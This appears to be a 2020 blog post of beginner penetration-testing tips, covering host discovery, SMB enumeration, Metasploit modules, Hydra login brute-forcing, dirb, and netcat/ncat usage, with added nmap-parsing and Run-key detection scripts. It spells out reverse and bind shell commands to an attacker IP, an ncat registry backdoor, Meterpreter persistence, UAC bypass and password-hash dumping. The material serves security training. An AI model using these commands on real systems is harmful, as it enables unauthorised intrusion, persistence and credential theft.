Back to Basics -> Junior pentester tips and methodology

Cyber Coaching
6 min read · Apr 15, 2020


Recently a very experienced government cyber analyst and I were discussing tradecraft. He made a valid point in stating that "experts and pros focus on the basics and do the basics well". I couldn't agree more, and it got me thinking that perhaps I should share some of the basic tips I think a junior should master when starting out in the penetration testing world.

Setting Up

cat /etc/resolv.conf

echo "nameserver X.X.X.X" > /etc/resolv.conf   (note: > overwrites the file, >> appends)

service network-manager status|start|stop

route -n

route add default gw X.X.X.X eth0

One-liners for internal host discovery:

  • arp-scan $ipaddress | grep 192.168.X | cut -f1 | grep -v ipv4 | grep -v MAC > hosts.txt
  • cat *.nmap | grep "open" | grep -v "filtered" | cut -d "/" -f1 | sort -u | xargs
  • fping -a -g [ip range]  (ICMP ping sweep of the internal range)

Breaking the first command down:

  • arp-scan $ipaddress | grep 192.168.X | cut -f1 = run arp-scan on the selected IP range, then from the results only show the lines matching the first three octets of the IP address, and keep only the first column (the IP).

I particularly like the second one-liner as it gives quick results on which port numbers ("services") are open across the network range. This can be really useful in certification exams like TIGER Scheme QSTM and CREST CRT, as you will get asked which port numbers are open on a given IP range.
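As an added example (not from the original post), here is the same "which ports are open" question answered by parsing nmap's normal (.nmap) output, but matching the STATE column exactly rather than grepping for the word "open" anywhere on the line, and also keeping the answer per host. The nmap output below is constructed sample data; the function names are my own.

```shell
#!/bin/sh
# Constructed sample of nmap normal output (-oN) for two hosts.
SAMPLE_NMAP='# Nmap 7.80 scan initiated
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
PORT     STATE         SERVICE
22/tcp   open          ssh
80/tcp   open          http
139/tcp  closed        netbios-ssn
445/tcp  open          microsoft-ds
Nmap scan report for fileserver.lab (192.168.1.11)
PORT     STATE         SERVICE
22/tcp   open          ssh
161/udp  open|filtered snmp
3306/tcp filtered      mysql
8080/tcp open          http-proxy  Apache httpd (open port forwarder)'

# open_ports: distinct port numbers whose STATE is exactly "open"
# (so "open|filtered" is excluded), numerically sorted, one per line.
# Reads nmap normal output on stdin.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, p, "/"); print p[1] }' \
        | sort -un
}

# open_ports_by_host: "host port" pairs, so the answer is kept per host
# instead of being merged across the whole range. Handles both the
# "report for IP" and "report for name (IP)" header forms.
open_ports_by_host() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, p, "/"); print host, p[1] }
    ' | sort -u
}

# Stand-alone usage: the one-line exam answer, then the per-host view.
printf '%s\n' "$SAMPLE_NMAP" | open_ports | xargs
printf '%s\n' "$SAMPLE_NMAP" | open_ports_by_host
```

Replace the printf with `cat *.nmap | open_ports` to run it over real scan output.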

Gather a hostname

nslookup $Ip  (nmap $Ip will also report the hostname)

Metasploit database (msfdb)

>cat 10hosts.txt 192hosts.txt 172hosts.txt > hosts.txt   (-iL takes a single input file)

>db_nmap -vv -iL hosts.txt

>db_nmap -vv -sU -iL 10hosts.txt

>db_status

>msfdb init

Nessus

/sbin/service nessusd start|stop

Web interface: https://localhost:8834

SMB - Server Message Block

SMB has for a long time been in the spotlight for notorious vulnerabilities. To really master internal pentesting you need to spend a while reading up on SMB and become comfortable exploiting this service. Here is an overview.

I think SMB exploitation can get confusing as there are so many different tools, so let's look at a selection and keep it simple.

>nmap --script "smb-vuln*" -p445 192.168.83.0/24

>nmap -A -p 445 $Ip

>For Linux, to enumerate the host's NetBIOS name table: nmblookup -A $Ip

>For Windows, a null-session connection to a share: net use \\$IP\[sharename]$ "" /u:""

nmblookup on Linux

>A manual method using the built-in Python script samrdump.py (from Impacket) to enumerate the password policy and users

Built-in Python script gathering user names and the password policy

You should be aware of the most common SMB vulns:

MS17-010 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 which affects Vista / Server 2008 / Win 7 / 2008 R2 / Win 8.1 / 2012 (R2) / Win 10 / Server 2016

For older Windows machines like Windows 2000 / XP / Windows 2003: MS08-067 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

Understand pass-the-hash (PtH) and SMB relay attacks:
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

msfconsole:

use auxiliary/scanner/smb/smb_login

set SMBPass [hash]

set SMBUser [user]

also

use exploit/windows/smb/psexec

also

use exploit/windows/smb/ms17_010_psexec

Web Applications:

VirusTotal is great for finding subdomains: https://www.virustotal.com/gui/home/search

Along with DNS searching, another good method is checking the site's certificates for subdomains at crt.sh

gobuster dir -u http://10.10.10.140 -w [wordlist] -t 50

sublist3r -v -d [domain] -b  (-b brute forces using /usr/share/sublist3r/subbrute/names.txt)

  • amass
  • apt install snapd -> service snapd start -> snap install amass
  • amass enum -d [domain]

Using Hydra to brute-force HTTP form authentication

In the browser's developer tools, select the Network tab and then attempt to log in (this will fail). After the login fails, click on the POST request and then click on "Edit and Resend".

Look for the hostname/IP, login page, request body, and the error message.

Command build
With all the information that we have collected, now let's build the hydra command.
Change <Login Page>: this value has to start with a "/" (forward slash).
Change <Request Body> to the format from the page. We do need to modify the username and password: replace the failed username with ^USER^ and the failed password with ^PASS^. This change will allow hydra to substitute the values.
Change <Error Message> to the failed login error message.
Change <IP Address> to either an IP address or a hostname.
Change <User> to either a username or a username list.
Change <Password> to either a password or a password list.

Layout of command: hydra -L <User> -P <Password> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"

Command for brute-forcing an HTTP POST auth form

dirb tips

  • dirb [domain] -p [proxy] sends requests through a proxy, so you can pass your dirb results to Burp: dirb http://somesite.com -p 127.0.0.1:8080
  • -c [cookie] sends a cookie, e.g. to run as an authenticated user
  • -z 1000 adds a 1000 ms delay, limiting requests to one per second in case of a WAF
  • -X [extensions] appends extensions to each word, e.g. -X ".php,.bak" (-x [file] reads them from a file)

MySQL:

mysql -u [username] -p -h [$Ip]  (prompts for the password; to pass it inline use -p[pass] with no space)

Netcat and Ncat:

nc -lvp 8888 > received.txt  (listen and save whatever arrives to a file)

nc -lvp 8888 -e /bin/bash  (listener)

nc -v [victim ip] 8888

id / whoami

Whoever connects is handed /bin/bash: by using the -e switch followed by a command, the connecting shell automatically executes that command.

ncat

Very similar to netcat (nc). Very useful if you can get ncat.exe onto the Windows victim machine.

attacker > ncat -l -p 5555 -v

victim>ncat -e cmd.exe [attacker ip] 5555

Creating a persistent backdoor

With ncat we need to add the command to the system registry. Firstly, on the attacker machine you will need to set up your listener.

attacker:

>ncat -l -p 5544 -v

Victim:

Now we add the ncat command to the registry:

start > run > regedit > Computer > HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Right click to add a string value pointing at the ncat binary: select New > String Value, then double click on the new value and enter the command you want to run, e.g. "C:\Windows\System32\ncat.exe 192.168.X.X 5544 -e cmd.exe"

Adding the ncat string value to the registry under HKEY_LOCAL_MACHINE

You can now restart the victim machine; once it restarts you will get a shell on the attacker listener.
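Because the Run key above is exactly where a reviewer or incident responder looks for this kind of persistence, here is an added defender-side check (not part of the original post) that reads the text output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` and flags autorun values that launch an nc/ncat-style binary with -e. The registry listing and the value names are constructed sample data; the function name is my own.

```shell
#!/bin/sh
# Constructed sample of "reg query ...\Run" output copied off a host.
# reg query indents each value and separates name, type and data with four spaces.
SAMPLE_REG='
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    Updater    REG_SZ    C:\Windows\System32\ncat.exe 192.168.10.5 5544 -e cmd.exe
    svchost    REG_SZ    C:\Users\Public\NC.EXE -l -p 8888 -e cmd.exe
'

# suspicious_run_entries: print "NAME<TAB>COMMAND" for each string value whose
# command runs nc/ncat/netcat (any case, with or without .exe) together with
# the -e "execute on connect" switch. Reads reg query output on stdin.
suspicious_run_entries() {
    awk -F '    ' '
        { sub(/^ +/, "") }                       # drop the indent reg query adds
        NF >= 3 && $2 ~ /^REG_(EXPAND_)?SZ$/ {
            name = $1; cmd = $3; lc = tolower(cmd)
            # binary name must stand alone: preceded by start, backslash, space or quote
            if (lc ~ /(^|[\\ "])(nc|ncat|netcat)(\.exe)?([ "]|$)/ && lc ~ / -e( |$)/)
                printf "%s\t%s\n", name, cmd
        }'
}

# Stand-alone usage: on a live host feed it real output instead of the sample.
printf '%s\n' "$SAMPLE_REG" | suspicious_run_entries
```

The same check is worth running over HKCU\...\Run and the RunOnce keys, which autostart a program in exactly the same way.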

Other methods of persistence

Meterpreter:

use exploit/windows/local/s4u_persistence

set session 2

set trigger logon

set payload windows/meterpreter/reverse_tcp

set lhost / lport

exploit

To test it, set up a listener:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport

run

Now reboot the victim and wait for the shell :P

More on Meterpreter

"hashdump" reads the SAM, so it can only be run as SYSTEM; therefore attempt to privesc by typing "getsystem". If it fails it may be due to UAC; you can check whether UAC is enabled with:

>post/windows/gather/win_privs

To bypass UAC:

>background

>search uac

>use exploit/windows/local/bypassuac

>set session X

>exploit

After you have elevated privileges by bypassing UAC, here are some useful commands:

  • getpid (identify your current pid)
  • ps -U SYSTEM (choose a pid in the list)
  • migrate [PID]
  • getpid

VNC (port 5800|5900)

You can use Firefox to connect via VNC.

use auxiliary/scanner/vnc/vnc_login

Permissions

user | group | other  (read=4 | write=2 | exe=1)

LDAP

ldapsearch -h [ip] -x -b "DC=[name],DC=local" | grep pwd

Kerberos

I think it's fair to say that if you can master all of the above you will be in a fairly good place as a junior pentester. Remember: keep it simple and keep enumerating. Thanks for reading. CodedHound!


Written by Cyber Coaching

Passionate about helping fill the global cyber security skills shortage gap, through cyber education and coaching www.cybercoaching.co.uk
